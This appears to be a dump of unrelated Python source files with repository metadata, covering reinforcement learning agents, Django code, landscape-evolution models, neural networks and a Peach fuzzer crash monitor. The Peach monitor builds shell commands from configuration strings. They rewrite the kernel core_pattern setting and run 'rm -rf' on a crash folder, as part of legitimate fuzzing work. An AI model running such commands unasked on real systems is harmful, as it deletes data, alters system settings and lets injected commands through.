for s in range(j + 1, j + offset):
p_s = pentagonal_number(s)
p_k = p_s - p_j
p_d = p_k - p_j
if pentagonal(p_k) and pentagonal(p_d):
break
else:
continue
return p_k - p_j
assert pentagonal_numbers(offset=10_000) == 5_482_660
| 3.40625
| 3
|
retropie/get_files.py
|
dmsun/Arch-Linux-Config
| 0
|
12783457
|
<reponame>dmsun/Arch-Linux-Config
#! /usr/bin python
import os
# change the directory to the rom hub
cwd = os.chdir("/home/pi/RetroPie/roms")
extensions = ['.srm', '.eep', '.state', '.hi', '.hs', '.fs'
'.dat', '.cfg', '.nv']
def get_files(directory=os.getcwd()):
with open("/home/pi/backup_files.txt", 'w') as test:
for root, dir, files in os.walk(directory):
for name in files:
if name.endswith(tuple(extensions)):
test.write(os.path.join(root, name))
test.write("\n")
| 2.671875
| 3
|
Problem Set 3 - Student Version/reinforcement_learning.py
|
MuhammeedAlaa/MI-Assignemnets
| 0
|
12783458
|
<filename>Problem Set 3 - Student Version/reinforcement_learning.py
from typing import Callable, DefaultDict, Dict, Generic, List, Optional, Union
from agents import Agent
from environment import Environment, S, A
from helpers.mt19937 import RandomGenerator
from helpers.utils import NotImplemented
import json
from collections import defaultdict
# The base class for all Reinforcement Learning Agents required for this problem set
class RLAgent(Agent[S, A]):
rng: RandomGenerator # A random number generator used for exploration
actions: List[A] # A list of all actions that the environment accepts
discount_factor: float # The discount factor "gamma"
epsilon: float # The exploration probability for epsilon-greedy
learning_rate: float # The learning rate "alpha"
def __init__(self,
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__()
self.rng = RandomGenerator(seed) # initialize the random generator with a seed for reproducability
self.actions = actions
self.discount_factor = discount_factor
self.epsilon = epsilon
self.learning_rate = learning_rate
# A virtual function that returns the Q-value for a specific state and action
# This should be overriden by the derived RL agents
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
return 0
# Returns true if we should explore (rather than exploit)
def should_explore(self) -> bool:
return self.rng.float() < self.epsilon
def act(self, env: Environment[S, A], observation: S, training: bool = False) -> A:
actions = env.actions()
if training and self.should_explore():
#return the action with index self.rng.int(0, len(actions) - 1)
return actions[self.rng.int(0, len(actions) - 1)]
else:
# if more than one action has the maximum q-value, return the one that appears first in the "actions" list
#get the max action
max_action = actions[0]
max_q = self.compute_q(env, observation, actions[0])
for action in actions:
q = self.compute_q(env, observation, action)
# for all actions check if it has a q value bigger than the max and update max
if q > max_q:
max_q = q
max_action = action
#return max action
return max_action
#############################
####### SARSA ######
#############################
# This is a class for a generic SARSA agent
class SARSALearningAgent(RLAgent[S, A]):
Q: DefaultDict[str, DefaultDict[str, float]] # The table of the Q values
# The first key is the string representation of the state
# The second key is the string representation of the action
# The value is the Q-value of the given state and action
def __init__(self,
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__(actions, discount_factor, epsilon, learning_rate, seed)
self.Q = defaultdict(lambda:defaultdict(lambda:0)) # The default Q value is 0
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
return self.Q[str(state)][str(action)] # Return the Q-value of the given state and action
# NOTE: we cast the state and the action to a string before querying the dictionaries
# Update the value of Q(state, action) using this transition via the SARSA update rule
def update(self, env: Environment[S, A], state: S, action: A, reward: float, next_state: S, next_action: Optional[A]):
# update the Q(state, action) with the equation in instructions
self.Q[state.__str__()][action.__str__()] += self.learning_rate * (reward + self.discount_factor *
self.Q[next_state.__str__()][next_action.__str__()] - self.Q[state.__str__()][action.__str__()])
# Save the Q-table to a json file
def save(self, file_path: str):
with open(file_path, 'w') as f:
json.dump(self.Q, f, indent=2, sort_keys=True)
# load the Q-table from a json file
def load(self, file_path: str):
with open(file_path, 'r') as f:
self.Q = json.load(f)
#############################
##### Q-Learning ######
#############################
# This is a class for a generic Q-learning agent
class QLearningAgent(RLAgent[S, A]):
Q: DefaultDict[str, DefaultDict[str, float]] # The table of the Q values
# The first key is the string representation of the state
# The second key is the string representation of the action
# The value is the Q-value of the given state and action
def __init__(self,
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__(actions, discount_factor, epsilon, learning_rate, seed)
self.Q = defaultdict(lambda:defaultdict(lambda:0)) # The default Q value is 0
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
return self.Q[str(state)][str(action)] # Return the Q-value of the given state and action
# NOTE: we cast the state and the action to a string before querying the dictionaries
# Given a state, compute and return the utility of the state using the function "compute_q"
def compute_utility(self, env: Environment[S, A], state: S) -> float:
# get all actions
actions = env.actions()
#get max q
max_q = self.compute_q(env, state, actions[0])
for action in actions:
q = self.compute_q(env, state, action)
# for all actions check if it has a q value bigger than the max and update max
if q > max_q:
max_q = q
#return q max
return max_q
# Update the value of Q(state, action) using this transition via the Q-Learning update rule
def update(self, env: Environment[S, A], state: S, action: A, reward: float, next_state: S, done: bool):
# If done is True, then next_state is a terminal state in which case, we consider the Q-value of next_state to be 0
if done:
q_next = 0
else:
q_next = self.compute_utility(env, next_state)
#update Q(state, action) with the equation in instructions
self.Q[state.__str__()][action.__str__()] += self.learning_rate * (reward + self.discount_factor *
q_next - self.Q[state.__str__()][action.__str__()])
# Save the Q-table to a json file
def save(self, file_path: str):
with open(file_path, 'w') as f:
json.dump(self.Q, f, indent=2, sort_keys=True)
# load the Q-table from a json file
def load(self, file_path: str):
with open(file_path, 'r') as f:
self.Q = json.load(f)
#########################################
##### Approximate Q-Learning ######
#########################################
# The type definition for a set of features representing a state
# The key is the feature name and the value is the feature value
Features = Dict[str, float]
# This class takes a state and returns the a set of features
class FeatureExtractor(Generic[S, A]):
# Returns a list of feature names.
# This will be used by the Approximate Q-Learning agent to initialize its weights dictionary.
@property
def feature_names(self) -> List[str]:
return []
# Given an enviroment and an observation (a state), return a set of features that represent the given state
def extract_features(self, env: Environment[S, A], state: S) -> Features:
return {}
# This is a class for a generic Q-learning agent
class ApproximateQLearningAgent(RLAgent[S, A]):
weights: Dict[str, Features] # The weights dictionary for this agent.
# The first key is action and the second key is the feature name
# The value is the weight
feature_extractor: FeatureExtractor[S, A] # The feature extractor used to extract the features corresponding to a state
def __init__(self,
feature_extractor: FeatureExtractor[S, A],
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__(actions, discount_factor, epsilon, learning_rate, seed)
feature_names = feature_extractor.feature_names
self.weights = {str(action):{feature: 0 for feature in feature_names} for action in actions} # we initialize the weights to 0
self.feature_extractor = feature_extractor
# Given the features of state and an action, compute and return the Q value
def __compute_q_from_features(self, features: Dict[str, float], action: A) -> float:
q = 0
# for all features apply the equation form instructions to get the q value
for k in features.keys():
q += self.weights[action.__str__()][k] * features[k]
return q
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
features = self.feature_extractor.extract_features(env, state)
return self.__compute_q_from_features(features, action)
def update(self, env: Environment[S, A], state: S, action: A, reward: float, next_state: S, done: bool):
# If done is True, then next_state is a terminal state in which case, we consider the Q-value of next_state to be 0
if done:
q_next = 0
else:
# compute the q_max for the next state
actions = env.actions()
q_next = self.compute_q(env, next_state, actions[0])
for next_action in actions:
q = self.compute_q(
env, next_state, next_action)
# for all actions check if it has a q value bigger than the max and update max
if q_next < q:
q_next = q
# copy the weights so we don't affext it while updating
weights = self.weights.copy()
# get state features
features = self.feature_extractor.extract_features(env, state)
q = self.compute_q(env, state, action)
# update the weights in temp dictionary
for k in features.keys():
weights[action.__str__()][k] += self.learning_rate * (reward + self.discount_factor * q_next - q) * features[k]
# set the weights to the temp dictionary
self.weights = weights.copy()
# Save the weights to a json file
def save(self, file_path: str):
with open(file_path, 'w') as f:
json.dump(self.weights, f, indent=2, sort_keys=True)
# load the weights from a json file
def load(self, file_path: str):
with open(file_path, 'r') as f:
self.weights = json.load(f)
| 2.90625
| 3
|
utils.py
|
DandelionLau/NetworkCollections
| 8
|
12783459
|
<reponame>DandelionLau/NetworkCollections
"""
@FileName: utils.py
@Description: Implement utils
@Author : Ryuk
@CreateDate: 2019/12/26 9:28
@LastEditTime: 2019/12/26 9:28
@LastEditors: Ryuk
@Version: v0.1
"""
def getLayers(model):
"""
get each layer's name and its module
:param model:
:return: each layer's name and its module
"""
layers = []
def unfoldLayer(model):
"""
unfold each layer
:param model: the given model or a single layer
:param root: root name
:return:
"""
# get all layers of the model
layer_list = list(model.named_children())
for item in layer_list:
module = item[1]
sublayer = list(module.named_children())
sublayer_num = len(sublayer)
# if current layer contains sublayers, add current layer name on its sublayers
if sublayer_num == 0:
layers.append(module)
# if current layer contains sublayers, unfold them
elif isinstance(module, torch.nn.Module):
unfoldLayer(module)
unfoldLayer(model)
return layers
| 2.578125
| 3
|
back-end/api/migrations/0009_auto_20161114_0228.py
|
tuftsjumbocode/bostonathleticsassociation
| 2
|
12783460
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-14 02:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0008_merge_20161114_0228'),
]
operations = [
migrations.AlterField(
model_name='volunteer',
name='email',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='volunteer',
name='jacket',
field=models.CharField(max_length=30),
),
migrations.AlterField(
model_name='volunteer',
name='years_of_service',
field=models.CharField(max_length=3),
),
]
| 1.59375
| 2
|
tests/test_functions.py
|
enceladus-rex/chainer-transformer
| 0
|
12783461
|
from chainer_transformer.functions import generate_positional_encodings
import pytest
def test_generate_positional_encoding():
start = 0
end = 100
dim = 256
l = end - start
output = generate_positional_encodings(start, end, dim)
assert output.shape == (l, dim)
| 2.234375
| 2
|
python/gpu-enabled-multiprocessing.py
|
GangababuManam/tensorflow-101
| 832
|
12783462
|
<reponame>GangababuManam/tensorflow-101<gh_stars>100-1000
import pandas as pd
import multiprocessing
from multiprocessing import Pool
def train(index, df):
import tensorflow as tf
import keras
from keras.models import Sequential
#------------------------------
#this block enables GPU enabled multiprocessing
core_config = tf.ConfigProto()
core_config.gpu_options.allow_growth = True
session = tf.Session(config=core_config)
keras.backend.set_session(session)
#------------------------------
#prepare input and output values
df = df.drop(columns=['index'])
data = df.drop(columns=['target']).values
target = df['target']
#------------------------------
model = Sequential()
model.add(Dense(5 #num of hidden units
, input_shape=(data.shape[1],))) #num of features in input layer
model.add(Activation('sigmoid'))
model.add(Dense(1))#number of nodes in output layer
model.add(Activation('sigmoid'))
model.compile(loss='mse', optimizer=keras.optimizers.Adam())
#------------------------------
model.fit(data, target, epochs = 5000, verbose = 1)
model.save("model_for_%s.hdf5" % index)
#------------------------------
#finally, close sessions
session.close()
keras.backend.clear_session()
#-----------------------------
#main program
multiprocessing.set_start_method('spawn', force=True)
df = pd.read_csv("dataset.csv")
my_tuple = [(i, df[df['index'] == i]) for i in range(0, 20)]
with Pool(10) as pool:
pool.starmap(train, my_tuple)
| 2.875
| 3
|
scuole/campuses/views.py
|
texastribune/scuole
| 1
|
12783463
|
<filename>scuole/campuses/views.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.shortcuts import get_object_or_404
from django.views.generic import DetailView
from scuole.counties.models import County, CountyCohorts
from scuole.districts.models import District, DistrictStats
from scuole.regions.models import RegionCohorts
from scuole.states.models import StateStats
from scuole.stats.models import SchoolYear
from .models import Campus, CampusStats
class CampusDetailView(DetailView):
county_cohorts_model = CountyCohorts
region_cohorts_model = RegionCohorts
def get_object(self):
return get_object_or_404(
Campus.objects.prefetch_related("principals"),
slug=self.kwargs["slug"],
district__slug=self.kwargs["district_slug"],
)
def get_context_data(self, **kwargs):
context = super(CampusDetailView, self).get_context_data(**kwargs)
county_cohorts = self.county_cohorts_model.objects.filter(
county=self.object.county
)
region_cohorts = self.region_cohorts_model.objects.filter(
region=self.object.district.region
)
# year = self.kwargs["campus_year"]
# if year:
# context["stat"] = get_object_or_404(
# CampusStats, year__name=year, campus=self.object
# )
# context["district"] = get_object_or_404(
# DistrictStats, year__name=year, district=self.object.district
# )
# context["state"] = get_object_or_404(
# StateStats, year__name=year, state__name="TX"
# )
# else:
latest_year = SchoolYear.objects.first()
context["stat"] = get_object_or_404(
CampusStats, year=latest_year, campus=self.object
)
context["district"] = get_object_or_404(
DistrictStats, year=latest_year, district=self.object.district
)
context["state"] = get_object_or_404(
StateStats, year=latest_year, state__name="TX"
)
context["latest_county_cohort"] = county_cohorts.latest_cohort(
county=self.object.county
)
context["latest_region_cohort"] = region_cohorts.latest_cohort(
region=self.object.district.region
)
return context
| 2.046875
| 2
|
LEM_scripts_1.py
|
DavidLitwin/SpectralDiffusion
| 2
|
12783464
|
<reponame>DavidLitwin/SpectralDiffusion
# -*- coding: utf-8 -*-
"""
Created on Wed May 1 09:38:14 2019
@author: dgbli
Run spectral diffuser in a landscape evolution model. This code does not account
for a difference in boundary conditions between the diffusion model (periodic)
and the FastscapeEroder (fixed gradient). This is the reason why the tiled approach
that appears in Flat_torus_LEM was used.
"""
import numpy as np
import matplotlib.pyplot as plt
import pickle
import LEMFunctions as lf
from landlab.components import LinearDiffuser, FlowAccumulator, FastscapeEroder
from landlab.plot import imshow_grid
from landlab import RasterModelGrid, CLOSED_BOUNDARY, FIXED_VALUE_BOUNDARY
from matplotlib.pyplot import figure, show, plot, xlabel, ylabel, title
TicToc = lf.TicTocGenerator()
#%% Run with landlab diffusion
np.random.seed(3)
Nx = 100
Ny = 100
dx = 10
mg = RasterModelGrid((Nx,Ny), dx)
z = mg.add_zeros('topographic__elevation', at='node' )
#mg.core_nodes['topographic__elevation'] = np.random.rand(mg.number_of_core_nodes)
mg.set_status_at_node_on_edges(right=FIXED_VALUE_BOUNDARY, top=FIXED_VALUE_BOUNDARY,left=FIXED_VALUE_BOUNDARY,bottom=FIXED_VALUE_BOUNDARY)
z_array = z.reshape((mg.shape))
z_init = np.zeros(mg.shape)
z_init[1:-1,1:-1] = np.random.rand(np.shape(z_array[1:-1,1:-1])[0],np.shape(z_array[1:-1,1:-1])[1])
z_init = z_init.reshape((np.size(z_init)))
z[:] = z_init
imshow_grid(mg,'topographic__elevation')
dt = 50
T_max = 1E5
nt = int(T_max//dt)
D = 1E-4
uplift_rate = 1E-3 #m/yr
uplift_per_step = uplift_rate*dt
m = 0.5 #Exponent on A []
n = 1.0 #Exponent on S []
K = 1E-11*(365*24*3600) #erosivity coefficient [yr−1]
ld = LinearDiffuser(mg,linear_diffusivity=D)
fr = FlowAccumulator(mg,'topographic__elevation',flow_director='D8')
sp = FastscapeEroder(mg,K_sp = K,m_sp = m, n_sp=n)
lf.tic()
for i in range(nt):
fr.run_one_step()
sp.run_one_step(dt)
ld.run_one_step(dt)
mg.at_node['topographic__elevation'][mg.core_nodes] += uplift_per_step
if i % 20 == 0:
print ('Completed loop %d' % i)
lf.toc()
imshow_grid(mg,'topographic__elevation')
z_array_landlab = z.reshape((mg.shape))
pickle.dump(z_array_landlab, open("Landlab_test2.p","wb"))
#%% Run with my explicit finite difference diffuser
mg1 = RasterModelGrid((Nx,Ny), dx)
z1 = mg1.add_zeros('topographic__elevation', at='node' )
mg1.set_status_at_node_on_edges(right=FIXED_VALUE_BOUNDARY, top=FIXED_VALUE_BOUNDARY,left=FIXED_VALUE_BOUNDARY,bottom=FIXED_VALUE_BOUNDARY)
dt = 50
T_max = 1E5
nt = int(T_max//dt)
D = 1E-4
uplift_rate = 1E-3 #m/yr
uplift_per_step = uplift_rate*dt
m = 0.5 #Exponent on A []
n = 1.0 #Exponent on S []
K = 1E-11*(365*24*3600) #erosivity coefficient [yr−1]
np.random.seed(3)
z_array = z1.reshape((mg1.shape))
z_init = np.zeros(mg1.shape)
z_init[1:-1,1:-1] = np.random.rand(np.shape(z_array[1:-1,1:-1])[0],np.shape(z_array[1:-1,1:-1])[1])
z_init = z_init.reshape((np.size(z_init)))
z1[:] = z_init #z is tied to the RasterModelGrid mg1
fr1 = FlowAccumulator(mg1,'topographic__elevation',flow_director='D8')
sp1 = FastscapeEroder(mg1,K_sp = K,m_sp = m, n_sp=n)
lf.tic()
for i in range(nt):
fr1.run_one_step()
sp1.run_one_step(dt)
z_array = z1.reshape((mg1.shape))
z_new = lf.Explicit_Diffuser_one_step(z_array,D,dt,dx,dx)
z_new = z_new.reshape((np.size(z_new)))
z1[:] = z_new
mg1.at_node['topographic__elevation'][mg1.core_nodes] += uplift_per_step
if i % 20 == 0:
print ('Completed loop %d' % i)
lf.toc()
imshow_grid(mg1,'topographic__elevation')
z_array_explicit = z1.reshape((mg.shape))
pickle.dump(z_array_explicit, open("Landlab_explicit_test1.p","wb"))
#%% Run with full spectral diffuser
mg2 = RasterModelGrid((Nx,Ny), dx)
z2 = mg2.add_zeros('topographic__elevation', at='node' )
mg2.set_status_at_node_on_edges(right=FIXED_VALUE_BOUNDARY, top=FIXED_VALUE_BOUNDARY,left=FIXED_VALUE_BOUNDARY,bottom=FIXED_VALUE_BOUNDARY)
dt = 50
T_max = 1E5
nt = int(T_max//dt)
D = 1E-4
uplift_rate = 1E-3 #m/yr
uplift_per_step = uplift_rate*dt
m = 0.5 #Exponent on A []
n = 1.0 #Exponent on S []
K = 1E-11*(365*24*3600) #erosivity coefficient [yr−1]
np.random.seed(3)
z_array = z2.reshape((mg2.shape))
z_init = np.zeros(mg2.shape)
z_init[1:-1,1:-1] = np.random.rand(np.shape(z_array[1:-1,1:-1])[0],np.shape(z_array[1:-1,1:-1])[1])
z_init = z_init.reshape((np.size(z_init)))
z2[:] = z_init #z is tied to the RasterModelGrid mg2
fr1 = FlowAccumulator(mg2,'topographic__elevation',flow_director='D8')
sp1 = FastscapeEroder(mg2,K_sp = K,m_sp = m, n_sp=n)
A = lf.Spectral_Diffuser(z_array,D,dt,dx,dx,'explicit')
lf.tic()
for i in range(nt):
fr1.run_one_step()
sp1.run_one_step(dt)
z_array = z2.reshape((mg2.shape))
z_new = lf.Full_Spectral_Diffuser_one_step(z_array,A)
z_new = z_new.reshape((np.size(z_new)))
z2[:] = z_new
mg2.at_node['topographic__elevation'][mg2.core_nodes] += uplift_per_step
if i % 20 == 0:
print ('Completed loop %d' % i)
lf.toc()
imshow_grid(mg2,'topographic__elevation')
z_array = z2.reshape((mg.shape))
pickle.dump(z_array, open("Landlab_full_spectral_test1.p","wb"))
#%%
z_array_spectral = pickle.load(open("Landlab_full_spectral_test1.p","rb"))
z_diff = z_array_landlab - z_array_spectral
plt.imshow(z_diff)
| 2.109375
| 2
|
Peach/Agent/linux.py
|
aleasims/Peach
| 0
|
12783465
|
<reponame>aleasims/Peach
#
# Copyright (c) <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Authors:
# <NAME> (<EMAIL>)
# $Id: peach.py 1986 2010-03-05 07:19:57Z meddingt $
import struct, sys, time
from Peach.agent import Monitor
import os, re, pickle
class LinuxApport(Monitor):
'''
Monitor crash reporter for log files.
TODO - Monitor syslog for crash event, then wait for report
'''
def __init__(self, args):
'''
Constructor. Arguments are supplied via the Peach XML
file.
@type args: Dictionary
@param args: Dictionary of parameters
'''
if args.has_key('Executable'):
self.Executable = str(args['Executable']).replace("'''", "")
else:
self.Executable = None
if args.has_key('LogFolder'):
self.logFolder = str(args['LogFolder']).replace("'''", "")
else:
self.logFolder = "/var/crash/"
if not args.has_key('PeachApport'):
raise PeachException("Error, LinuxApport monitor requires the PeachApport parameter providing full path to \"peach-apport\" program.")
self.PeachApport = str(args['PeachApport']).replace("'''", "")
# Our name for this monitor
self._name = "LinuxApport"
self.data = None
self.startingFiles = None
os.system('echo "|' + self.PeachApport +' %p %s %c" > /proc/sys/kernel/core_pattern')
os.system('rm -rf ' + self.logFolder + '/*')
def OnTestStarting(self):
'''
Called right before start of test case or variation
'''
# Monitor folder
self.startingFiles = os.listdir(self.logFolder)
def OnTestFinished(self):
'''
Called right after a test case or varation
'''
pass
def GetMonitorData(self):
'''
Get any monitored data from a test case.
'''
if self.data == None:
return None
return {"LinuxApport-Crash.txt":self.data}
def DetectedFault(self):
'''
Check if a fault was detected.
'''
try:
# Give crash reporter time to find the crash
time.sleep(0.25)
time.sleep(0.25)
self.data = None
for f in os.listdir(self.logFolder):
if not f in self.startingFiles and (self.Executable == None or f.find(self.Executable) > -1):
fd = open(os.path.join(self.logFolder, f), "rb")
self.data = fd.read()
fd.close()
os.unlink(os.path.join(self.logFolder, f))
return True
return False
except:
print sys.exc_info()
return False
def OnFault(self):
'''
Called when a fault was detected.
'''
pass
def OnShutdown(self):
'''
Called when Agent is shutting down, typically at end
of a test run or when a Stop-Run occurs
'''
# Stop calling our script
os.system('echo "" > /proc/sys/kernel/core_pattern')
def StopRun(self):
'''
Return True to force test run to fail. This
should return True if an unrecoverable error
occurs.
'''
return False
def PublisherCall(self, method):
'''
Called when a call action is being performed. Call
actions are used to launch programs, this gives the
monitor a chance to determin if it should be running
the program under a debugger instead.
Note: This is a bit of a hack to get this working
'''
pass
# end
| 1.914063
| 2
|
tests/unit/utils/test_context_processors.py
|
etienne86/oc_p13_team_spirit
| 0
|
12783466
|
<reponame>etienne86/oc_p13_team_spirit
"""
This module contains the unit tests related to
the context processors in app ``utils``.
"""
# from django.test import TestCase
| 1.304688
| 1
|
reviewboard/reviews/tests/test_template_tags.py
|
davidt/reviewboard
| 1
|
12783467
|
<reponame>davidt/reviewboard
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.template import Context, Template
from django.test.client import RequestFactory
from django.utils import six
from reviewboard.accounts.models import Profile
from reviewboard.testing import TestCase
class IfNeatNumberTagTests(TestCase):
"""Unit tests for {% ifneatnumber %} template tag."""
def test_milestones(self):
"""Testing the ifneatnumber tag with milestone numbers"""
self.assertNeatNumberResult(100, '')
self.assertNeatNumberResult(1000, 'milestone')
self.assertNeatNumberResult(10000, 'milestone')
self.assertNeatNumberResult(20000, 'milestone')
self.assertNeatNumberResult(20001, '')
def test_palindrome(self):
"""Testing the ifneatnumber tag with palindrome numbers"""
self.assertNeatNumberResult(101, '')
self.assertNeatNumberResult(1001, 'palindrome')
self.assertNeatNumberResult(12321, 'palindrome')
self.assertNeatNumberResult(20902, 'palindrome')
self.assertNeatNumberResult(912219, 'palindrome')
self.assertNeatNumberResult(912218, '')
def assertNeatNumberResult(self, rid, expected):
t = Template(
'{% load reviewtags %}'
'{% ifneatnumber ' + six.text_type(rid) + ' %}'
'{% if milestone %}milestone{% else %}'
'{% if palindrome %}palindrome{% endif %}{% endif %}'
'{% endifneatnumber %}')
self.assertEqual(t.render(Context({})), expected)
class MarkdownTemplateTagsTests(TestCase):
"""Unit tests for Markdown-related template tags."""
def setUp(self):
super(MarkdownTemplateTagsTests, self).setUp()
self.user = User.objects.create_user('test', '<EMAIL>')
Profile.objects.create(user=self.user, default_use_rich_text=False)
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.user
self.context = Context({
'request': request,
})
def test_normalize_text_for_edit_escape_html(self):
"""Testing {% normalize_text_for_edit %} escaping for HTML"""
t = Template(
"{% load reviewtags %}"
"{% normalize_text_for_edit '<foo **bar**' True %}")
self.assertEqual(t.render(self.context), '&lt;foo **bar**')
def test_normalize_text_for_edit_escaping_js(self):
"""Testing {% normalize_text_for_edit %} escaping for JavaScript"""
t = Template(
"{% load reviewtags %}"
"{% normalize_text_for_edit '<foo **bar**' True True %}")
self.assertEqual(t.render(self.context),
'\\u0026lt\\u003Bfoo **bar**')
| 2.28125
| 2
|
flan/flanintegration.py
|
bretlowery/flan
| 3
|
12783468
|
from abc import ABCMeta, abstractmethod
try:
from flan import istruthy, error, info
except:
from flan.flan import istruthy, error, info
pass
import settings
import os
import threading
import _thread as thread
def _timeout(exportname):
error('Flan->%s import timed out' % exportname)
thread.interrupt_main() # raises KeyboardInterrupt
def timeout_after(s):
"""
Use as decorator to exit process if function takes longer than s seconds
"""
def outer(fn):
def inner(*args, **kwargs):
x = fn
timer = threading.Timer(s, _timeout, args=[fn.__module__])
timer.start()
try:
result = fn(*args, **kwargs)
finally:
timer.cancel()
return result
return inner
return outer
class FlanIntegration:
__metaclass__ = ABCMeta
def __init__(self, name, meta, config):
self.name = name
self.meta = meta
self.config = None
self.loglevel = None
self.haltonerror = None
self.version = settings.__VERSION__
def logerr(self, err):
if self.loglevel == "errors" or self.haltonerror:
error('Flan->%s exports failed: %s' % (self.name, err))
if self.haltonerror:
os._exit(1)
return
def loginfo(self, msg):
if self.loglevel == "info":
info(msg)
return
@staticmethod
def istruthy(val):
return istruthy(val)
def _getsetting(self, name, erroronnone=True, checkenv=False, defaultvalue=None):
val = defaultvalue
try:
if checkenv:
val = os.environ[name.upper()]
except KeyError:
pass
if not val:
ln = name.lower()
if ln in self.config:
val = self.config[ln]
if not val and erroronnone:
self.logerr('Flan->%s config failed: no %s defined in the environment or passed to Flan.' % (self.name, name))
return val
| 2.53125
| 3
|
logs/plot.py
|
xinyandai/distributed-compressed-sgd
| 3
|
12783469
|
<reponame>xinyandai/distributed-compressed-sgd
import matplotlib.pyplot as plt
import numpy as np
fontsize=44
ticksize=40
legendsize=30
plt.style.use('seaborn-white')
plt.figure(figsize=(12.8, 9.25))
def read_csv(file_name):
return np.genfromtxt(fname=file_name, delimiter=',', skip_header=1)
def _plot_setting():
plt.xlabel('# Epoch', fontsize=ticksize)
plt.ylabel('Top1 - Accuracy', fontsize=ticksize)
plt.yticks(fontsize=ticksize)
plt.xticks(fontsize=ticksize)
plt.legend(loc='lower right', fontsize=legendsize)
plt.show()
# sgd = read_csv("csv/results.csv")
# plt.plot(sgd[:, 0] * 1.5, 100.0 - sgd[:, 4], 'black', label='SGD', linestyle='--', marker='s')
# hsq = read_csv("csv/val_accuracy.csv")
# plt.plot( 1.28 * (hsq[:, 0] + 1), hsq[:, 1] * 100.0, 'red', label='HSQ', linestyle='-', marker='x')
linewidth = 1
sgd = read_csv("sgd_32bit/csv/val_accuracy.csv")
plt.plot( (sgd[:, 0] + 1), sgd[:, 1] * 100.0, 'black', label='SGD', linestyle='--', marker='x', linewidth=linewidth)
hsq = read_csv("nnq_d8_k256/csv/val_accuracy.csv")
plt.plot( (hsq[:, 0] + 1), hsq[:, 1] * 100.0, 'red', label='HSQ', linestyle='-', marker='s', linewidth=linewidth)
_plot_setting()
| 2.703125
| 3
|
test_lung_seg_scan_luna.py
|
Aryan98/lcprediction
| 0
|
12783470
|
import sys
import lasagne as nn
import numpy as np
import theano
import pathfinder
import utils
from configuration import config, set_configuration
from utils_plots import plot_slice_3d_4
import theano.tensor as T
import blobs_detection
import logger
import time
import multiprocessing as mp
import buffering
theano.config.warn_float64 = 'raise'
if len(sys.argv) < 2:
sys.exit("Usage: test_luna_scan.py <configuration_name>")
config_name = sys.argv[1]
set_configuration('configs_seg_scan', config_name)
# predictions path
predictions_dir = utils.get_dir_path('model-predictions', pathfinder.METADATA_PATH)
outputs_path = predictions_dir + '/%s' % config_name
utils.auto_make_dir(outputs_path)
# logs
logs_dir = utils.get_dir_path('logs', pathfinder.METADATA_PATH)
sys.stdout = logger.Logger(logs_dir + '/%s.log' % config_name)
sys.stderr = sys.stdout
data_iterator = config().train_data_iterator
print
print 'Data'
print 'n samples: %d' % data_iterator.nsamples
start_time = time.time()
n_pos = 0
tp = 0
for n, (ct, lung_mask, annotations, tf_matrix, pid) in enumerate(data_iterator.generate()):
print '-------------------------------------'
print n, pid
n_pos += annotations.shape[0]
n_pid_tp = 0
annotations = np.int32(annotations)
for i in xrange(annotations.shape[0]):
if lung_mask[0, 0, annotations[i, 0], annotations[i, 1], annotations[i, 2]] == 1:
n_pid_tp += 1
tp += n_pid_tp
print annotations.shape[0], n_pid_tp
if annotations.shape[0] > n_pid_tp:
print '----HERE-----!!!!!'
print 'total', n_pos
print 'detected', tp
| 1.796875
| 2
|
src/networks/lenet.py
|
francesco-p/FACIL
| 243
|
12783471
|
from torch import nn
import torch.nn.functional as F
class LeNet(nn.Module):
"""LeNet-like network for tests with MNIST (28x28)."""
def __init__(self, in_channels=1, num_classes=10, **kwargs):
super().__init__()
# main part of the network
self.conv1 = nn.Conv2d(in_channels, 6, 5)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 16, 120)
self.fc2 = nn.Linear(120, 84)
# last classifier layer (head) with as many outputs as classes
self.fc = nn.Linear(84, num_classes)
# and `head_var` with the name of the head, so it can be removed when doing incremental learning experiments
self.head_var = 'fc'
def forward(self, x):
out = F.relu(self.conv1(x))
out = F.max_pool2d(out, 2)
out = F.relu(self.conv2(out))
out = F.max_pool2d(out, 2)
out = out.view(out.size(0), -1)
out = F.relu(self.fc1(out))
out = F.relu(self.fc2(out))
out = self.fc(out)
return out
| 3.421875
| 3
|
